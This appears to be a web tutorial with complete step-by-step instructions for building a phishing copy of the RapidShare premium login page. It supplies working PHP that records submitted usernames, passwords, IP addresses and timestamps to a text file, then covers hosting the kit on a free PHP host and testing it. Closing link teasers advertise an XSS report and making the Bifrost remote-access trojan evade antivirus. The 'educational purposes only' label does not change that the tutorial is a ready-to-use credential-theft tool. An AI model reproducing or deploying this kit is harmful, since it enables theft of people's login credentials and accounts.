1.You can use this same tut for anything else…

2. Go to

http://www.rapidshare.com

and navigate to the premium account log-in screen at the url :

https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi

3. We will now begin to make our phisher. Start by right clicking on the page and click view source.

4. Select all and paste into a notepad document.

5. You should see a bunch of random html coding, but we are only interested in two words: method and action.

6. Do a search in the document for the word “method” (without quotes).

7. Your result should be something like : method=”post”

8. Change the word post to the word get.

9. Now do a search for the word “action” (without quotes). action is usually very close to method so you may not even have to do a search for it.

10. You should see something like this: action=”

https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi”

11. Where the url in between the quotes is, replace the text with next.php so the new part says: action=”next.php”

12. Save this file as index.html and create a new document on notepad.

13. In the new document, we will be making the next.php page, or the page that they are directed to after you have gotten their log-in information.

14. Copy and paste this code into the notepad document:

<?php
$datum = date(‘d-m-Y / H:i:s’);
$ip = $_SERVER[‘REMOTE_ADDR’];
header(“Location: Put your REDIRECT URL Here”);
$handle = fopen(“password.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “IP: $ip | Date: $datum (Date=0 GTM)\r\n”);
fwrite($handle, “\r\n”);
fclose($handle);

setcookie (“user”, “empty”, time()+3600);
exit;
?>
15. after the word location, where it says redirect url here, put in the original log-in screen url, or the url of the page that you want to send them after they type in their information. My next.php file looks like this:

<?php
$datum = date(‘d-m-Y / H:i:s’);
$ip = $_SERVER[‘REMOTE_ADDR’];
header(“Location: https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi”);
$handle = fopen(“password.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “IP: $ip | Date: $datum (Date=0 GTM)\r\n”);
fwrite($handle, “\r\n”);
fclose($handle);

setcookie (“user”, “empty”, time()+3600);
exit;
?>

16. Save this file as next.php and open up a new notepad document.

17. Save this document as password.txt. The file that you need to save it as is in the next.php file right here:
$handle = fopen(”password.txt”, “a”);
I chose password.txt as my file where I want the passes to be stored, but you can change it to anything you want.

18. Go to a free web hosting client that supports php files, my personal favorite is freeweb7.com, and upload the 3 files, making sure to delete any files that were uploaded by the web host themselves, such as a sample index.html page.

19. Go check your url and type in test as the user and test as the pass and then navigate to your pass file and see if it shows up. If it shows up SUCCESS!!! It is time to start phishing.

credits to the author watchdog

This is for educational purposes only.

Explore More

Critical XSS vulnerability in YouthDreams.Net

Security Researcher $@T0R! reported another XSS vulnerability in http://www.youthdreams.net Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject

Yet another simple Google Docs hack

A simple hack that allow you to edit read only Google docs is explained here http://googlesystem.blogspot.com/2009/01/copy-google-documents-to-your-account.html It works and all you need is to hack the url a bit like

Study on the undetectable Server Bifrost 1.2d for the AV

1. Objective Trying to make the Bifrost Server 1.2d which is the latest version of a remote control KSV undetectable to Antivirus Software Required —– description ———————————————————————— Download Bifrost 1.2dR.AT